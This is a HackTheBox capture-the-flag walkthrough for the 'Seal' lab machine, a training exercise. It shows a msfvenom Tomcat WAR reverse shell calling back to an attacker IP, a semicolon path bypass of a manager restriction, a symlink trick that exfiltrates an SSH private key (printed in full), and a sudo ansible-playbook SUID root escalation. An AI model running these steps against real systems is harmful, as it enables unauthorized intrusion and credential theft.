HackTheBox Walkthrough : Seal

Today we have another challenge from “hackthebox” called seal . In this lab we enumerate git-bucket and discover the credentials and other endpoint and by exploiting cronjob we get root.So without wasting time let start.

Level : Medium

Attacking Strategy

  • Recon
    • Nmap
  • Enumeration
    • Git-bucket Enumeration
    • Credential Discovery
    • Bypass restriction
  • Exploitation
    • Tomcat Reverse shell
  • Privilege Escalation
    • Sudoers privilege escalation
    • ansible-playbook

Walkthrough

IP Address : 10.10.10.250

We start with nmap scan which help in identifying the running services and open ports on target .

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.250
Nmap scan report for 10.10.10.250
Host is up (1.2s latency).
Not shown: 64840 filtered ports, 692 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy

From result port 22 for SSH , port 443 for SSL /HTTP and on port 8080 another HTTP services running on with ngnix service on server. After visiting the landing page its normal market page which didn’t reveal anything useful .

Enumeration

After enumerating the landing page we start the content discovery of the web server to get other end-points of the application and feroxbuster help here.

feroxbuster -u http://seal.htb -k 

When we try to access paths we got 404 means resources not found and Apache tomcat is there which gives some idea for exploitation , if some how we can upload war payload then we can get reverse shell .

With previous experiences if we are able to access the html page then we can easily upload the war file and trigger the payload from there but we got 403 error .

After investing some time on this path we start enumerating port 8080 on which git bucket services is running so we simply register the user and make the login to it. In repositories section we have two repos one seal_market and another infra , seal market look interesting as it matches the name we start enumerating the seal market repository.

It look like this is hosted application code and configurations and we have 13 commits on this repository and we also get some username alex and luis from the repo .

In commits there are changes are made to the tomcat configuration in user file from where we get the credentials.

Username : tomcat

Password : 42MrHBf*z8{Z%

After enumerating more in ngnix configuration we got something interesting , we get to know why we get 403 for accessing the path “https://seal.htb/manager/html ”

Now we need to modify the path and we simply put the ; in path and see did we pass it or not and yes pass the restriction this happens due to the tomcat path traversal via reverse proxy mapping for more you can read here after putting the credentials which we got from user.xml it lands to HTML page.

Exploitation

Interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files and war file have payload which can trigger easily to get the reverse shell . For more about exploitation you can read here.

To create payload we have metasploit and get the reverse tcp shell on port 1234 .

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.28 LPORT=1234 -f war > sky.war 
file sky.war 

Now simply upload the war file but one twist while uploading the file request was made at /manager/html/ which is restricted so using burp suite we need to modify the request .

Make the changes

After successful upload we can trigger the payload from html page directly .

For reverse shell simply click on payload and on netcat at port 1234 we get the shell with tomcat user .

Privilege Escalation

Now its time to perform privilege escalation for that start enumerating the box and after sometime we get that some process is running in every few seconds by application called ansible playbook by luis user privileges which is calling an run.yml file under /opt/backups/playbook

After investing the run.yml file there some backup is generated from /var/lib/tomcat9/webapps/ROOT/admin/dashboard to /opt/backups/archives/ . So we simply make a symbolic link of .ssh directory to upload section because we didn’t have any rights to dashboard but under dashboard on upload we have rights.

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

After few seconds there is backup file generated under /opt/backups/archives so we simply copy that file to /tmp directory and unzip it where we get the id_rsa file of the luis user.

Now we have private key we can make password less login to server .

-----BEGIN OPENSSH PRIVATE KEY-----
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
u8KqOiDVrwmFJRAAAACWx1aXNAc2VhbAE=
-----END OPENSSH PRIVATE KEY-----
chmod 0600 key 
ssh -i key [email protected]

After further enumerating the privileges of user luis , luis can run ansible-playbook without need password to exploit we simply check the gtfobin and we got the idea .

We simply create the yml file in which the task is created to put the SUID bit on bash binary

nano root.yml 
- hosts: localhost
  tasks:
  - name: Execute a command using the shell module
    shell: chmod u+s /bin/bash
sudo ansible-playbook root.yml
ls -la /bin/bash
/bin/bash -p 
id 
cd /root 
cat root.txt 

Finally we got root and collect the flags .

References

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.